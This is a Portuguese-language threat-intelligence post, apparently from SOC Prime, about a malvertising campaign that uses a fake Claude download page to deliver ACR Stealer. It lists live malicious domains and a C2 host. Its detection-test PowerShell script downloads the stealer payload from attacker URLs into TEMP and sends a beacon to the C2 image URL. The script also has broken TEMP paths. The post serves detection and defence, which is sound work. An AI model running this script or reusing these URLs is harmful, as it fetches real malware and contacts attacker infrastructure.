SOC Prime Bias: Médio

26 May 2026 16:05 UTC
newspaper icon SANS Internet Storm Center

Página de Imitação do Claude Pode Entregar ACR Stealer

Author Photo
SOC Prime Team linkedin icon Seguir
Página de Imitação do Claude Pode Entregar ACR Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

Pesquisadores de ameaças identificaram uma campanha publicitária maliciosa que redireciona os usuários para uma página falsa de download do Claude. O site entrega diferentes cargas úteis dependendo do sistema operacional da vítima, com a cadeia de infecção do Windows levando à implantação do ACRStealer. Os investigadores ligaram a atividade a múltiplos domínios comprometidos e um servidor de comando-e-controle usado após a infecção. A campanha depende de URLs ofuscadas e um script PowerShell para completar a entrega das cargas úteis.

Investigação

O analista rastreou a atividade desde a página falsa inicial do Claude através de várias URLs redirecionadas hospedadas em diferentes domínios. Durante a cadeia de infecção, foi feito o download de um arquivo ZIP, um script PowerShell e uma imagem JPEG, seguido de comunicação HTTPS com um domínio de comando-e-controle. A análise de tráfego confirmou que o comportamento da rede pós-infecção correspondia à infraestrutura associada à família ACRStealer.

Mitigação

As organizações devem bloquear os domínios e URLs maliciosos identificados no perímetro da rede. O tráfego de publicidade deve ser filtrado para anúncios maliciosos que referenciem a página falsa do Claude ou iscas de imitação semelhantes. A proteção de endpoint também deve ser configurada para detectar comportamento relacionado ao ACRStealer e execução suspeita de PowerShell.

Resposta

Os defensores devem monitorar as conexões de saída para o domínio de comando-e-controle yw.enhanceblabber.cc e alertar sobre downloads do arquivo ZIP e script PowerShell identificados. Qualquer host que apresente atividade relacionada deve passar por coleta forense para possíveis artefatos do ACRStealer e ser isolado se a comprovação de comprometimento for confirmada.

Fluxo de Ataque

Ainda estamos atualizando esta parte. Inscreva-se para ser notificado

Notifique-me

Execução de Simulação

Pré-requisito: A Verificação de Pré-Voo de Telemetria & Base deve ter sido aprovada.

Justificação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar exatamente a telemetria esperada pela lógica de detecção.

  • Narrativa do Ataque & Comandos:

    1. Isca Inicial: O atacante envia um e-mail de phishing contendo um link para https://fairpoint29.com/. A vítima clica no link, que carrega uma página falsa de download do Claude.
    2. Execução do Downloader Malicioso: A página aciona automaticamente um download de https://primemetricsa.com/1518925, entregando uma carga útil disfarçada.
    3. Recuperação de Carga Secundária: O stub baixado contata https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d para buscar o binário completo do ACR Stealer.
    4. Beacon C2: Uma vez executado, o malware envia um beacon para https://i.ibb.co/Xx16sbMz/init-block.jpg (uma técnica que abusa do hosting de imagem para C2 encoberto).

    Cada etapa gera uma entrada de log de proxy que corresponde exatamente aos valores de domínio and url definidos na regra Sigma, assim satisfazendo a condição de detecção.

  • Script de Teste de Regressão:

    # -------------------------------------------------
# Simulação de Distribuição do ACR Stealer – Regra de Disparo
# -------------------------------------------------
# Passo 1: Página falsa de download do Claude (GET inofensivo)
Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null

# Passo 2: Binário do downloader (simulado por um pequeno download de arquivo)
Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing

# Passo 3: Recuperação de carga completa
Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" `
  -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing

# Passo 4: Beacon C2 (POSTando uma pequena imagem para disfarçar o tráfego)
$body = [System.Text.Encoding]::UTF8.GetBytes("beacon")
Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" `
  -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null
# -------------------------------------------------
# Fim da Simulação
# -------------------------------------------------

  • Comandos de Limpeza:

    # Remove artefatos baixados
Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue

# Limpa o cache DNS para evitar entradas remanescentes
ipconfig /flushdns

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente